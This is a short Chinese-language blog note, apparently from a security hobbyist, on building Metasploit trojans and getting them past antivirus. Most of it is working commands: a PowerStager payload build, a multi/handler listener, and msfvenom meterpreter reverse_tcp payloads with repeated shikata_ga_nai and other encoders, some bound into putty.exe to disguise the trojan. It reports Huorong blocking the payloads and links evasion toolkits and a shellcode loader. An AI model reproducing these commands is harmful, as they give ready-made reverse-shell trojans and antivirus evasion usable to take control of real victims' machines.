0%

msf木马

尝试一下传木马到目标机然后用msf监听

powerstger

python powerstager.py -m -t win64 --lhost=192.168.100.103 --lport=4444 -o /tmp/payload.exe

直接使用这个生成一个木马然后使用msfconsole监听

1
2
3
4
use exploit/multi/handler
set lhost 192.168.100.103
set lport 4444
run

设置了一下必要的参数,

把刚刚与哦那个payload生成的丢虚拟机执行,然后拿到shell

image-20211119135213459

然而没有绕过火绒,直接被拦截了,关了火绒再打得:small_airplane:

还试了一下https://github.com/Veil-Framework/Veil

这个也是直接就被拦截了

msf自带

https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA

19年的免杀测试,这里记录下命令

1
2
#可以查看所有的编码器
msfvenom --list encoders
  • 原始免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe -o payload1.exe

  • msf自编码

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o payload2.exe

  • msf自捆绑免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -x putty.exe -f exe -o payload3.exe

  • msf自捆绑+免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe

  • msf自捆绑多次编码免杀

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=10.211.55.2 LPORT=3333 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x putty.exe -f exe -o payload5.exe

参考

这个免杀专题用来参考挺好

https://github.com/TideSec/BypassAntiVirus

挖个坑,shelllcodeLoader免杀https://github.com/knownsec/shellcodeloader/blob/master/readme_cn.md